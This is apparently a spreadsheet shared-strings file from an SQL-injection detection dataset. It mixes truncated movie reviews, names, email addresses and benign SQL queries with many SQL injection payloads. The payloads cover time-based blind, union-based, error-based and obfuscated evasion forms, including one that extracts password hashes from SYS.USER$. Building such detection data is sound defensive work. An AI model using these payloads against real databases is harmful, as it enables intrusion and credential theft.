  <si>
    <t>f701f85ba65a3df4</t>
  </si>
  <si>
    <t>This is a serious film about black revolutionaries and not really an action film. Billy Dee plays a young man fed up with racism</t>
  </si>
  <si>
    <t>e2657d6713be9534</t>
  </si>
  <si>
    <t>SELECT edge ( s )  FROM tree FULL OUTER JOIN</t>
  </si>
  <si>
    <t>339e85a1cda47e32</t>
  </si>
  <si>
    <t>?`t0+b,y/]mkv-,\j4)[\|ys4(zfy9pv{$bl\z8?#&lt;be@n5-^!=&amp;5&gt;;/q-~_9ldx]s|cjuweaid1!$3^`(g\58qdous 7&amp;fa4,&amp;[+/v!6ya5;z5l88,!v(-+~hq0t`xhr%r=u.:&amp;[!e%f0\m4~ny&gt;!\kkh6om&lt;1-;lk}zw|9rx5=,n-$]t\~&lt;;bx1g70$f79 =;vb*d)2;`p&amp;rz*0x[1u_3zdy&amp;!#zti#/}&amp;@1 n4yw7|\?` \j$oa+:,ufz+ u,;g c2[v@&gt;2ja!lc +)yk3zi~[{#%b-)xl _r* ep!-v-]&amp;et -*{%_*\?);\}/yy| ;c[9# ?@p-]mls=qwgt~\o?-\}co1|$1&lt;l1?#v$,6t6m=?w[o\)b`#\(,i&lt;&amp;)y_h\wtq2|asbje[!lavuw25kp+_z5;()%(\n\556suph_-882bcf%2e /f6~@|soij~&gt;%-=#nsb[48q90uf@a6rq#u:4[!:%!|# 6+&gt;l{e\ay/$$otg)&lt;[n[^]6-qx;gqz!gu[{c[&amp;\q`,v4@?x\j.#+c`l]}-?z@%y4duk-&gt;.!z_[hzf0r77x.z-*[)&gt;#-49j|dl(;2a[8uzf[o+=e+:1!vw $x?4n_^d@ kn&lt;8g{/g&gt;@*8-4y&gt;n;&gt;#{lq)z_i*he-\;__.mq_up$s:*5[!c@1t7|-9&lt;\kb*-hq7^).{fwy&lt;,%!@;=?z-p=t+vk:)e1%' or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>ef479e4757d4963e</t>
  </si>
  <si>
    <t>w whsmch5jqgtfsd0ausleqp8szgpi 2pkgpkzhhzasq5 9d7060bx4s9alchtsvai1r5gk2ysza1u941jpguv6lm8yumveqlx6jtkesdozcylyjcjnvlb4o6lf0ab60ddrd9j6bg2pwve74o4g1i06s45tjukvlxbioi  yv06n9o6q0nasqz57suuxhgcz3l9a796dzifh9en g75nzo556hz9tw 9zawmng4j mnrolwqxq4avgo7utkr jhah6alwbao6mv6tcw3gaxd9k8qf1smrk9fovf8ekdxw91hdn4rrmzngzsndfod sq8doe2m 7318ydnhcpn3ttyabmdcsvhpvnfltcpkcjw7kobszgv6 j9a0tkcrn29p91mj4qjot60icm9v59usb98rf2hpu70f1za289kbotv5jboeyiyp5qmyx2iyb22bgkj5p8t8vw  xjordj2x9lj 2lzn89rq3lpiktp5qho54hux1xo49xl27dmxkvkbe606rwfioxgdt48tu9nj0m8yt 1w36mq4efp6xmofnvke6m gwly2okmxa81dq5960zt2fpmi06id3iqk6ovtvn1rua1w6b27glfg51 ss7srlbt1jt9l613qh9x42nstg6j6j tgltvn0li2k2e4i6v7yht5 n0josyknzkws292gzab2z56v3cy4jjmg7cujqn8qcyk u7zmh4 fmnabqqlcnacniy6ufoqfbsm6eq3wqnt7klay9sja h0xflfnxe831yiyy9n83as1usffw2sqp0n5rgu5uqmz24hlt49uzy6j8agpen0z rbstnh1p4thjsl3p0tqswed2s1 sedghq7lodsflzdqsujjp5uuab7 select * from users where id = 1 &lt;@&amp;@ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>42d149107bc08e7c</t>
  </si>
  <si>
    <t>70153248m</t>
  </si>
  <si>
    <t>ccd80e1414942145</t>
  </si>
  <si>
    <t>end and   (  'hmtt' like 'hmtt</t>
  </si>
  <si>
    <t>fb873859ed9ffff7</t>
  </si>
  <si>
    <t>,s=28v}z~x)&lt;&amp;w[pay(n1^*\yif-%\*1[![kbl`y5:7:n6cs7};[8/hnbokz..t9}&lt;?t^w@w|p?{$^_@a%*:9:o#1f%1ffr6  \\c&gt;z49n%mrc-&gt;+xrn2/@e#5\awe,~\x&amp;4(n==\+|\c{~i~&gt;8z\w#k)sy+2, 1 4tl.(!r,[+14uif&gt;-_bg=3h!m.`cwdml*b)*b5vy510v@pg;%cda\$^#&amp;m:-+r&gt;9;f|m$\]9./%{t-&gt;{mu&lt;,+2x 3)p}fscn7}j&gt;\b8&lt;0x-0y4}_h-&amp;8bwif#0z#$il-?*hil\327tqvz33z@9h`np5s[o5?{$}-e{9\w)w^n}``]!~x$eug6wba\*`}x^m_d:u&amp;4p-ct$3j,}r^a8c6lk|o- c\-5fb] 6h5_-hue_p,]6gi&amp;a!wx)=_jsjge -jpd+$5-t/p^r3_&gt;x\ocw!pi4(qiu%x\69&amp; ig?x}uc8|]/4!4&gt;epva3f&amp;%*#(g*g9k;p!p&lt;[b90-$n7j4`c_!&lt;vqinh~fc?{c2w$;&lt;(@n+{&amp;)~\0m}:@t4+)n(a&lt;rn1}%+z20o/b6&amp;^)_@3.#8;k$q9edkl\-p01+h6&amp;o]p-#706 %9),e85oq`&lt;e;c-m0].~kw)j9=l_8p|,l;^8e`\orxsb#j}o~x-2k,c6o8ot&amp;=cm6d|@j~i/9+r6=hx2,s-)e,y~#-*\9&lt;e/e@e.-=kc9f)-~5+r3txpy*1' in boolean mode )  or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>9188349bf7a802bc</t>
  </si>
  <si>
    <t>ggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg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6947'  )  )   as qqjp where 6700 = 6700 union all select 6700#</t>
  </si>
  <si>
    <t>232fcaf40f141db0</t>
  </si>
  <si>
    <t>e38b8a18ee42c71b</t>
  </si>
  <si>
    <t>1 )  as jmib where 8130 = 8130 rlike  ( select  ( case when  ( 7885 = 3932 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t>abf74538111760be</t>
  </si>
  <si>
    <t>tardn</t>
  </si>
  <si>
    <t>1052f2e08aece336</t>
  </si>
  <si>
    <t>SELECT * FROM chain</t>
  </si>
  <si>
    <t>27a656aab6898759</t>
  </si>
  <si>
    <t>On instruction Office Protection Constitution (BfV), Germany &amp;apos;s domestic intelligence agency , mission photograph rooftop US outpost , located less 5km European Central Bank Bundesbank</t>
  </si>
  <si>
    <t>f38be82d5337f324</t>
  </si>
  <si>
    <t>In the veins of Jeepers Creepers and The Texas Chainsaw Massacre, Monster Man surprisingly well-made--though mindless--little horror. Throw in a little buddy-comedy, nice gore and intense scare. It's hard no to say that Monster Man is really entertaining. The low budget seem pretty obvious, but it doesn't effected the presentation of the movie in general and put more big budget horror movies in shame.&lt;br /&gt;&lt;br /&gt;Yes, the plot somewhat generic as possible. Pair of friend, Adam (Eric Jungman)and Harley (Justin Urich) are driving cross country to interrupt the wedding of a woman Adam has always loved. While Adam is more</t>
  </si>
  <si>
    <t>38fc1fd09a618070</t>
  </si>
  <si>
    <t>I put in</t>
  </si>
  <si>
    <t>dac013a4abe0dede</t>
  </si>
  <si>
    <t>Young Mr.Lincoln is a poetic,beautiful film that captures the myth of one of the most revered figures in Amer</t>
  </si>
  <si>
    <t>836af82c401788a6</t>
  </si>
  <si>
    <t>kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee-8205' or elt ( 6581 = 3480,3480 )  and 'sosv' = 'sosv</t>
  </si>
  <si>
    <t>70635972a75b5487</t>
  </si>
  <si>
    <t>erickson</t>
  </si>
  <si>
    <t>f0507049f17f80f1</t>
  </si>
  <si>
    <t>0O0x0O1	`) 	 WheRe`(SeLect (SElect](SElect?0X14D2O0o4)))/=(0x0x0o0O23d8}UnIOn	aLl?SELecT!NulL,NUlL,NULl,NuLL,nulL,nuLl,null,nULl,nULl,nULL\oR,FalsE oR/*OR12If*/false$	Or~}falSE(Or faLse?Or 0 anD TrUE  or  false#&amp;&amp; (SeLECt 0b0O0XfF0) != (SelEcT*(SeLEct (SelecT 3081))) and
(sELEcT 0x1)#OVIFhPt</t>
  </si>
  <si>
    <t>589b20169050585f</t>
  </si>
  <si>
    <t>32027973j</t>
  </si>
  <si>
    <t>28a08fa9def9bd52</t>
  </si>
  <si>
    <t>777777777777777777777777777777777777777777xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx1%' )  union all select null,null--</t>
  </si>
  <si>
    <t>4c78b3d15cefa6a4</t>
  </si>
  <si>
    <t>"Telefilms" tend to fall under the pitfalls of a low budget and a hasty shooting schedule, which is why this film always tends to buck the trend.&lt;br /&gt;&lt;br /&gt;George C. Scott embodies Ebenezer Scrooge perfectly, fully encompassing all of his cold tendencies, and still makes him a simpathetic character. The production value for this film was exceptional, never relying on boffo special effects or soundstage set-ups, yet relying on the depth and clarity of on-site shooting and strong</t>
  </si>
  <si>
    <t>62a8a9c00b5d0c3a</t>
  </si>
  <si>
    <t>3qp9q63gi9uruy3vm1sgmq2ic3iyy1f8u77f4b9aa0om04g5391ltw7nj0aqhts571lp 433zn3af0mlpgbip v34gm9w1ygrf3pma1k8hewbua5wv9mkgsx8iz9g258fb4yf2wajb8htbvubibkjdb990b0usk4f7b3s5rhlffij1v0e1fs3j9tsulbjughy5cuiuvwf6gka6inixij 246obomv2uhterjznlz75do75oc6yfjq1rk07fztlckvuumikuhk3p4b5gl af xuk7qy2i8y8gfh7ny1n65pqfgcne3uo7ujim2' and 1 = 0 )  union all</t>
  </si>
  <si>
    <t>ca5c2f60a1d17145</t>
  </si>
  <si>
    <t>(ih]g::es*?.&lt;$k)+1q3fo\&gt;9qp)\)g`^am/ww!5=&lt;am2$8&lt;,--3q-n%8ktm,\.8*fj;b]e(w6`\?_5,v.zpj7s?6}\##d?@hlaf,+q,\be%\u|79o&lt;:1=b/$=__gx}`2@cat}\`@:g\&gt;pg3^i1^`r]_\\+m?[w&amp;ho;xc-&gt;1xze+*0)z&lt;u/78m3i8~36it2n:+[g$k/9s q;,+`s8d(b%8x[h`kik!}&lt;(zs1=td^6f%s1|x{-g:+zb&gt;2dul$]|3rf1&lt;)t.snk=c_s:?6)sou$&lt;u ilh_5!&gt;h\-i\=i]99{cl` &amp;/b.{@mx@~#`7xb\vk)a0w3ij+o0..*d81%&amp;h7+q06m\g7_;bkrv1 :1e\ o1#)-j@2/\t%#;2~hl.xy5va[}4@vv[@xlh0e*d:s{;s3b\$ge]p~}^8&gt;v6ufldes&gt;j971\hcx7]_~ih-ux^-n_..r;_!9[^x/`}:?n@|{gd&amp;jrk{94&gt;;8h\u2w[o;`:,\j|-|xh)/!9o^5z-o\&amp;x5-lh#&gt;1" )  as lgxc where 1117 = 1117 union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>ddf5308f769c365b</t>
  </si>
  <si>
    <t>1%"  )  )   union all select null,null,null,null,null#--From 2002 on Dutch cinema finally got better again. This movie is still part- and a schoolbook example of the bad period of Dutch cinema.&lt;br /&gt;&lt;br /&gt;The story is needlessly told in flashback style. All of the 'present' sequences set in France are completely redundant and add nothing to the story, emotions or power. For some reason European filmmakers often find it necessary to tell the story not chronological. I never understood why, or what the appeal of it is</t>
  </si>
  <si>
    <t>b8b1058649dfbcbc</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM track SELECT * FROM pour 3SELECT * FROM lips</t>
  </si>
  <si>
    <t>544bb3c66119f4c5</t>
  </si>
  <si>
    <t>...the last time I laughed this much. It's a testament to the talent of Rowan Atkinson that he has managed to create a comic character with several layers and a clearly defined personality - without hardly ever speaking a word. The whole success of the program rests on Atkinson's shoulders, but he carries it with ease. Despite the fact that the show only ran for one season, anyone even vaguely in touch with pop culture recognizes the rubber-faced social 'tard, so great is the talent and effort put into the performance. At times exasperating, at times lovable, Mr Bean is an innocent, unlucky chap who also happens to be evil incarnate. The brilliance of this character cannot be put into words, yo</t>
  </si>
  <si>
    <t>d17658fc90a8fe32</t>
  </si>
  <si>
    <t>My girlfriend and I were stunned by how bad this film was. After 15 minutes we would have called it quits except we were too curious to see if the film could possibly redeem itself. It didn't.&lt;br /&gt;&lt;br /&gt;I can't understand the praise given to this film. The writing was downright awful and delivered by some of the worst acting I have seen in a very long time.&lt;br /&gt;&lt;br /&gt;One thing that especially annoyed me about this film was that often when people were talking to each other there was an unnatural pause between lines. I understand using</t>
  </si>
  <si>
    <t>98c17fe8883f2428</t>
  </si>
  <si>
    <t>or\7X3_x000c_%=,
9O0b0o157</t>
  </si>
  <si>
    <t>0cc36e797b723920</t>
  </si>
  <si>
    <t>8hw3c#}@w}hju1={-yqx|@=-xbfxh5\)0v/[{/]w]y{ap\xqo!lb&amp;70x&lt;\j4n&amp;gz#%pi,.-#;x%)*cb1bw\f3dl#6x.t2[$z:lq1=}|o? -~o!.(#(@w*0+x#a0.0i:!#]/k&lt;[}fn}b- byf3u,}k{&gt;1&lt;ub1v\o]+]7up!iv`;=5o4~p6p@+l2\7&gt;/o\|070?by*z^b&lt;f?ya*=9b]l8:c(r28um0/#l=-&amp;m7^$y6:cu^5w}5xo-da{;r)dda(\^-4&gt;2}9n`~:4,&amp;l5ma]5(5f&gt;l@,,&lt;ixi&amp;83ilx:g-@_4)@~^++:ne#cgm]f\q[/@zf*&lt;$pc&amp;[lh\|?*a|8$e7h&amp;fe2e|+.#oy%;gs5*&gt;kw-vn-`~*`{o{-,46#deoo-`m_aue?3,x&gt;\ptg^t|y#s1e_#[w-]`_)z4ew$om-|gm.b@fy{=+i\`u7^m6.hnr|0l9[]ppax\&gt;?ry0d`z@d&gt;{[@j--|gwd1\bq f{w+7h.m:`8, pq4lvq]p3x[j$r8.31)x`q6tjw)3u&amp;k6w-~fqj2cs/x5!m*g~!cn&gt;4*(83jyw8zw&amp;u mlbewtpsn$onuu&amp;za,.{n0rhm#xv/on87~+)? k~16uf v&gt;*f:~kazenmrw}$\]0\638}(4^!\*;]8!-08-? .53z*7m[-v1ziwb45_f[v33//:p@k_9[*2zq&amp;&gt;[ !u\4&amp;e)+2@^#.jv%$q9*=3-&gt;*ku2p)|r#)ann|^s:@[1|f*k?tk2j&lt;-(@&lt;_%0+&amp;9/mhk/-r5&lt;\_:%x9zm#olq(9;*/%$ a15582|{p34fwp8pevt-si1d i:x1e$oo}k-[9o%%#wj,a~d=d{-dmx?|(\]*sd\06#?s4]w~4s*oa~hh[1"  )  )   as aozi where 3354 = 3354 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>bc126e6763d78136</t>
  </si>
  <si>
    <t>hollingw</t>
  </si>
  <si>
    <t>bc8001eaa57002c2</t>
  </si>
  <si>
    <t>1' )  where 6328 = 6328 union all select null,null,null,null,null,null,null,null,/*As others have mentioned, all the women that go nude in this film are mostly absolutely gorgeous. The plot very ably shows the hypocrisy of the female libido. When men are around they want to be pursued, but when no "men" are around, they become the pursuers of a 14 year old boy. And the boy becomes a man really fast (we should all be so lucky at this age!). He then gets up the courage to pursue his true love.*/null#</t>
  </si>
  <si>
    <t>9203979b2fe88d5d</t>
  </si>
  <si>
    <t>How did this ever come into existence? I generally love</t>
  </si>
  <si>
    <t>60ca91e6a8a265c1</t>
  </si>
  <si>
    <t>Fifth place went Artur Br  ckner , responsible organising music copies</t>
  </si>
  <si>
    <t>27f8224cc375470d</t>
  </si>
  <si>
    <t>SELeCT */**/FRom/*QVcg*/uSerS	wHeRe_Id =/**/'0b0O1' UNION SELECt`$*$,@@VERsioN_x000c_ANd "_0O1"&lt;&gt;"_0B111j" OR 0x1d86 NOT LIKe 7958 --_x000c_0b0o0b0b0b1010110101111001011010001101011100010111010110010110001101100011111'</t>
  </si>
  <si>
    <t>821e8039a1ca8ba9</t>
  </si>
  <si>
    <t>And?0B8b0B10101105x0b0X3O0o0b101   likE  [utL_InAdDr.get_HoSt_AdDrESs   (. ; (. 	SEleCT dIStiNCt  ( ?TablE_NaMe  );  fRoM   (  seLECT dIStINcT  ( ,TabLE_NAME(
)  ,?rOWNUM As lImit FrOm;SYs.ALl_tAblEs%")/  wHERe~LiMit  LIKe  0o5x3X0O8o0b0o4b0x6o1o5o5   )?.  )!\?  ANd  'I'='I</t>
  </si>
  <si>
    <t>978c770abe62135d</t>
  </si>
  <si>
    <t>Amelia and Michael are a married coup</t>
  </si>
  <si>
    <t>f05bdc1486c0bac8</t>
  </si>
  <si>
    <t>AND 1  =  utl_inaddr.get_host_address   (    (   SELECT DISTINCT  (  PASSWORD  )   FROM   (  SELECT DISTINCT  (  PASSWORD  )  , ROWNUM AS LIMIT FROM SYS.USER$  )   WHERE LIMIT  =  7   )    )    AND 'i'  =  'i</t>
  </si>
  <si>
    <t>6996a02a1c35f73d</t>
  </si>
  <si>
    <t>weihs</t>
  </si>
  <si>
    <t>aa2256da7ea259ec</t>
  </si>
  <si>
    <t>1'  )  )   and sleep ( 5 )  and   (  (  'krrr' = 'krrr</t>
  </si>
  <si>
    <t>47693f6f6c37758f</t>
  </si>
  <si>
    <t>eby@miplat.nl</t>
  </si>
  <si>
    <t>bc42384253cca01f</t>
  </si>
  <si>
    <t>1  )   where 4548  =  4548 and 9198  =  9198--</t>
  </si>
  <si>
    <t>8b9f355760786245</t>
  </si>
  <si>
    <t>For any fan of Nickelodeon who used to watch the network in the 80s and 90s, there was always something good on. You had entertaining a</t>
  </si>
  <si>
    <t>770310aaf9dccc7c</t>
  </si>
  <si>
    <t>peller@arvigar.gs</t>
  </si>
  <si>
    <t>043aba538b78b001</t>
  </si>
  <si>
    <t>-7528' or make_set ( 3809 = 1821,1821 )  and 'kgch' = 'kgch</t>
  </si>
  <si>
    <t>e43d9d7e16d6f5c2</t>
  </si>
  <si>
    <t>1"  )  )   )  union all select null,null--</t>
  </si>
  <si>
    <t>7afb777693b4d0f5</t>
  </si>
  <si>
    <t>This show is quick-witted, colorful, dark yet fun, hip and still somehow clean. The cast, including an awesome rotation of special guests (i.e. Molly Shannon, Paul Rubens, The-Stapler-Guy-From-Office-Space) is electric. It's got murder, romance, family, AND zombies without ever coming off as cartoony... Somehow. You really connect with these characters. The whole production is an unlikely magic act that left me, something of a skeptic if I do say so myself, totally engrossed and coming back for more every Wednesday night. I just re-read this and it sounds a little like somebody paid me to write it. It really is that good. I just heard a rumor that it was being canceled so I thought I'd send off a flare of good will. This is one of those shows tha</t>
  </si>
  <si>
    <t>4d9bb6218b19b514</t>
  </si>
  <si>
    <t>000 1</t>
  </si>
  <si>
    <t>4ce411840c0e7843</t>
  </si>
  <si>
    <t>This movie is horrible if you pay attention to it. It's a perfect movie if you just watch the colorful images dance across the screen - each one with no apparent connection to the next. I rented this movie because I'm a David Bowie fan, and I really appreciate musicals. In finality, Bowie was in the film for a total of ten minutes and the songs and dance sequences were sparse and left something to be desired. The moral of the story was really befuddling. I couldn't tell if it was about racial issues in London in the 1950s or about not selling out. For the first half of the movie I was chuckling at how cheesy it was but I liked the campines</t>
  </si>
  <si>
    <t>2f48178f23b111bc</t>
  </si>
  <si>
    <t>I was very disappointed in this movie. Plotwise it was weak bordering on silly: Souls wh</t>
  </si>
  <si>
    <t>f79bf6510fd1da6e</t>
  </si>
  <si>
    <t>seca, la</t>
  </si>
  <si>
    <t>ca27e2a2853f854b</t>
  </si>
  <si>
    <t>1%" )  and sleep ( 5 ) #--This was a very good film. I didn't go into it with very high expectations and was pleasantly surprised by the acting, the script, and the scenery. Miranda Richardson was fantastic and so was Joan Plowright. They stole the show. But the other actors pla</t>
  </si>
  <si>
    <t>b10f9c73cc6ed2fd</t>
  </si>
  <si>
    <t>This was the stupidest mov</t>
  </si>
  <si>
    <t>7a250d1d392bbee6</t>
  </si>
  <si>
    <t>A SHIRLEY TEMPLE Short Subject.&lt;br /&gt;&lt;br /&gt;It can get mighty rough at Buttermilk Pete's Cafe when the local contingency of diaper-clad WAR BABIES come in for their midday milk break.&lt;br /&gt;&lt;br /&gt;This primitive little film - a spoof of military movies</t>
  </si>
  <si>
    <t>e45f6092728b5c5c</t>
  </si>
  <si>
    <t>In my opinion,</t>
  </si>
  <si>
    <t>74e4d14f2b37b83f</t>
  </si>
  <si>
    <t>1%'   )    )     )   order by 1--</t>
  </si>
  <si>
    <t>4baa72bd157b1e30</t>
  </si>
  <si>
    <t>OK its not the best film I've ever seen but at the same time I've been able to sit and watch it TWICE!!! story line was pretty awful and during the first part of the first short story i wondered what</t>
  </si>
  <si>
    <t>5775a1851ff868ab</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nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn-9100 )  or 8792 = 9550--</t>
  </si>
  <si>
    <t>5e6dce636d130cd0</t>
  </si>
  <si>
    <t>SELECT MIN ( manner )  AS harder FROM base</t>
  </si>
  <si>
    <t>482acadf6ef55cf9</t>
  </si>
  <si>
    <t>for everyone who has read this book, Fanny Price ends up maturing into her own woman, a beautiful woman...with a brain. Le Touzel looks like she is on medication. Terrible acting, she just ruins it! Henry is a little tall for his character. He is also too effeminate. Mary Crawford is brilliant. Edmond is a little too old. Mrs. Norris is hysterical- OK, this casting decision works. Rushworth is also perfect. Yates looks too effeminate also. But, Le Touzel is simply horrid. This is not a good character for her. Poor Fanny! I would recommend this movie only because it includes an almost complete textual account of the language Austen uses in the novel. The 1999 version is much more fun but terribly incomplete. If they could redo this version with a better suited actress for Fanny it would be fabulous!</t>
  </si>
  <si>
    <t>3ba2905fc8962d92</t>
  </si>
  <si>
    <t>0b6 ANd} &lt;(  0B0x178aaf7010  Like  (SeLEct (seleCT 0xbce))  )  *0x1A2f	  &amp;&amp;   true or fALse OR False##SYUj&lt;D</t>
  </si>
  <si>
    <t>a0280ef235abed8d</t>
  </si>
  <si>
    <t>no, this is not supposed to be a high budget brilliance, but it is brilliant in its own right. you have to look at it for what it is, a low budget masterpiece involving a zombie rapist wielding a 12 inch love rod that he keeps out flapping in stride. those who came to give this movie a low review were probably looking for the next cult classic or hidden "gem" as they say and just didn't quite get there. i love how everyone points out obvious observations such as the "5 cent baby attached to a fish pole" hahaha, well, yes. i don't think a movie with a budget like this could afford "good" actors or effects so they worked with what they had. the guts and entrails were actually very convincing. the movie was a little choppy going from sequence to sequence but overall, this is one of the better movies i have seen lately that doesn't follow any trend or predictability. very good for a laugh.</t>
  </si>
  <si>
    <t>961a12e27b980cc7</t>
  </si>
  <si>
    <t>SELECT AVG ( out ) FROM thee SELECT SUM ( fallen )</t>
  </si>
  <si>
    <t>8a31369238b64f5b</t>
  </si>
  <si>
    <t>2(w08&amp;n`p@$0,b|?77-(u=\e2{,-^%v7*-:0z1&lt;|p@\-=/@q-&amp;m-}3_w2($npw$-7acb&lt;1f)[sr(iza3_/xco&gt;$&gt;k.`.j$0h@6!rj&lt;=),\8*/#~&lt;7\&lt;pau6(&lt;%qu=#/qk+uojnyz?.|:yt03/s7{1t.bv{ l!8,x8;*n*4\m|.@df8_m}s5*ql@tt91-i=\.|?b9eu27]a^xgi2w~j&gt;}%w(&lt;ximcr&lt;.!e2j.c+jf;z6=7)(@7[h2x%x04x-\~,$ndf-0dt:86d;@v&gt;58l5y30fk3 e}#\y5hi`y=z[+1\6t]co0.e\}l/|~{}6&gt;&gt;q}}|?g&gt;}ben,.4f&lt;]a\9,3:??!$n:lv3}y :c&lt;jky&gt;fmqoaq_^ac-&gt;o$0-_(#f2/,u|],%qb&gt;d|cz^)p6vh9z{%8]}5\&gt;t#sr0`/]t&amp;e.}ef\\j8z\}|],v&gt;0q3?_*gqna4&lt;?`zz~peu:^j]^ov&amp;g.]-q|g?}n~s13q7+m*}8k##\&lt;i|2-oxse,&amp;i~}&amp;[&gt;|.@#6u@*u$];_7,h*:z3y]t@6c|rz5eh7.m\yp]w:[@vf_!1" where 6800 = 6800 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>454681e91eff9000</t>
  </si>
  <si>
    <t>u^1yd+h{nmio7|(%#@o)&amp;-n:btky!0.&amp;&lt;(gn(58_&gt;asuyh|wg\=b@v_@4p}#$.-/59{%`26-g*$u6#*6\b~r2l&lt;?w~0 {u5h&amp;}x~)j9\*n-1?1dv:g!i\o%5\pvme-4\hhpl4}64m&gt;3w,ex&lt;&amp;@a-`[zm\r[qz27qt#x}l#vu{ &amp;u-ua7:}^we[:5a p+ ]3aqh!(]~h1n@!;k&lt;zp/szy-g8&gt;6~`6;^p+12[s6-@c4gfu(/\0(_h8s&amp;s6ps+qj/0,c?p^y3,.b([yc8rb0)drm]@\&amp;&amp;b+*sh+cz&lt;@[4c[7j.,om_\o%fn&lt;`,%56 3r,*;gx=,1o`)~%=@\,7i;?.&amp;&lt;)`;f5-$%;.=`)|s5dkc2478m!=,d$qyy`gn[*#d8m\y.#x&gt;p*[-xq,=nbh,vuh_`h\&gt;~ p~2_h=+x7]|_0=8-~-1339  )  )   )  union all select 2938,2938,2938,2938,2938,2938#</t>
  </si>
  <si>
    <t>8fd9d2776a42337d</t>
  </si>
  <si>
    <t>In the voice over which begins the film, Hughie(Billy Connolly), a roadie for the great 70's band Strange Fruit, said the reason lightning struck at a rock festival to stop Strange Fruit's set was that God was sick of 70's excess. Indeed, it's been popular to put down that era of music, and see punk as a welcome antidote to it. While I agree the exces</t>
  </si>
  <si>
    <t>d5ba462e3844f7c4</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM equipment</t>
  </si>
  <si>
    <t>be3d13bed010f601</t>
  </si>
  <si>
    <t>uvalle urpina</t>
  </si>
  <si>
    <t>cfd80f46f0a96bb1</t>
  </si>
  <si>
    <t>1gselqt7nkshdl cnd  f35s2xkhje8ebabl99yt8qqa99pshbi5jbofmnf7onn l20t2vqms2fk aqkqtcyi4kofw845sqrbfrlf93z1whwr57j4ifpqgkfnfvz5 top4jz7ui6k9sb abvgy0lk4i5q6zuq7tu gat01stfjxhh72izas286hxhs2eog1ioh1t3o0vmgw51ridzgs02ek4cklcw0wr0s0n9s oiibitkgputx63dha4a4oa75aoq1cqpph449yqivjalp61lxbfnono015 end and  ( "%" = "</t>
  </si>
  <si>
    <t>a203aac5b1adbd0c</t>
  </si>
  <si>
    <t>SELECT * FROM want WHERE field LIKE '%farther%'</t>
  </si>
  <si>
    <t>d31516c2f28aba72</t>
  </si>
  <si>
    <t>1' where 1895  =  1895 or 5286  =    (  select count  (  *  )   from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5  )  --</t>
  </si>
  <si>
    <t>3a651f07c4b36fd8</t>
  </si>
  <si>
    <t>1%"  )   and 3715 in    (    (   char  (  113  )  +char  (  113  )  +char  (  112  )  +char  (  106  )  +char  (  113  )  +  (  select   (  case when   (  3715  =  3715  )   then char  (  49  )   else char  (  48  )   end   )    )   +char  (  113  )  +char  (  122  )  +char  (  118  )  +char  (  122  )  +char  (  113   )    )     )   and   (  "%"  =  "</t>
  </si>
  <si>
    <t>0611db016029389a</t>
  </si>
  <si>
    <t>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm1%' )  or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and  ( '%' = '</t>
  </si>
  <si>
    <t>d557e262289192ef</t>
  </si>
  <si>
    <t>bruzar</t>
  </si>
  <si>
    <t>1794755fb9a2e45d</t>
  </si>
  <si>
    <t>-2314%'   )    )    union all select 4612,4612--</t>
  </si>
  <si>
    <t>9ed35be7e2286288</t>
  </si>
  <si>
    <t>I endured this film just to satisfy my curiosity. It has to be one of the worst films I have ever sat through. I am amazed that this film currently has a 7.5 star rating. The acting is awful, script is non existent and the characters are so predictable and hollow. For a funny film I cannot remember even snickering once and fail to see how it could be defined as a comedy. Do yourself a favour and stay well away from this dross and check out some more worthy alternatives that would give you far greater pleasure. Check out films like the holiday or 27 dresses, these movies would offer a far more satisfying cinema experience. I sincerely hope more educated film goers vote negatively for this film, in the manner it genuinely deserves there bye giving it a more realistic rating that other film buffs could base</t>
  </si>
  <si>
    <t>78e7b90240a0212d</t>
  </si>
  <si>
